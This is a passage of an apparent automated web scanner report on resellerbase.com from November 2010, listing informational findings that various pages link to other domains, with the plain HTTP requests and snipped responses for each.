X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.350. http://www.resellerbase.com/web-service/other/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.351. http://www.resellerbase.com/web-service/other/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/other/googlepr.php?link_id=9

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/other/googlepr.php?link_id=9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.352. http://www.resellerbase.com/web-service/other/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://hubshout.com/
http://jigsaw.w3.org/css-validator/check/referer
http://partners.netapplications.com/default.aspx?affid=1640669
http://validator.w3.org/check?uri=referer
http://www.micrositez.co.uk/white-label-seo-reseller-seo.html
http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=

Request

GET /web-service/other/search.php?cat=18&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:43:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 32002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://hubshout.com" name="link_46"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://hubshout.com" name="link_46"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html" name="link_44"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html" name="link_44"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.353. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/other/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.354. http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/other/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.355. http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/other/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.356. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.357. http://www.resellerbase.com/web-service/other/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.358. http://www.resellerbase.com/web-service/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://hubshout.com/
http://jigsaw.w3.org/css-validator/check/referer
http://partners.netapplications.com/default.aspx?affid=1640669
http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase
http://validator.w3.org/check?uri=referer
http://www.dograecorp.com/
http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase
http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase
http://www.myresellerpanel.com/
http://www.nicline.com/
http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156
http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=

Request

GET /web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:49:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 58891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dograecorp.com" name="link_45"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dograecorp.com" name="link_45"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase" name="link_12"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase" name="link_12"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase" name="link_8"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.hostcentric.com/join/index.bml?AffID=570113&LinkName=ResellerBase" name="link_8"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase" name="link_13"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://hubshout.com" name="link_46"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://hubshout.com" name="link_46"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=" name="link_15"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.myresellerpanel.com" name="link_5"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.myresellerpanel.com" name="link_5"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://partners.netapplications.com/default.aspx?affid=1640669" name="link_9"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nicline.com" name="link_28"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nicline.com" name="link_28"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.359. http://www.resellerbase.com/web-service/software-scripts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/software-scripts/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.360. http://www.resellerbase.com/web-service/software-scripts/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/software-scripts/googlepr.php?link_id=23

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/software-scripts/googlepr.php?link_id=23 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.361. http://www.resellerbase.com/web-service/software-scripts/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156

Request

GET /web-service/software-scripts/search.php?cat=14&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:44:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 21207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.pinnaclecart.com/affiliate/idevaffiliate.php?id=156" name="link_23"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.362. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/software-scripts/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.363. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

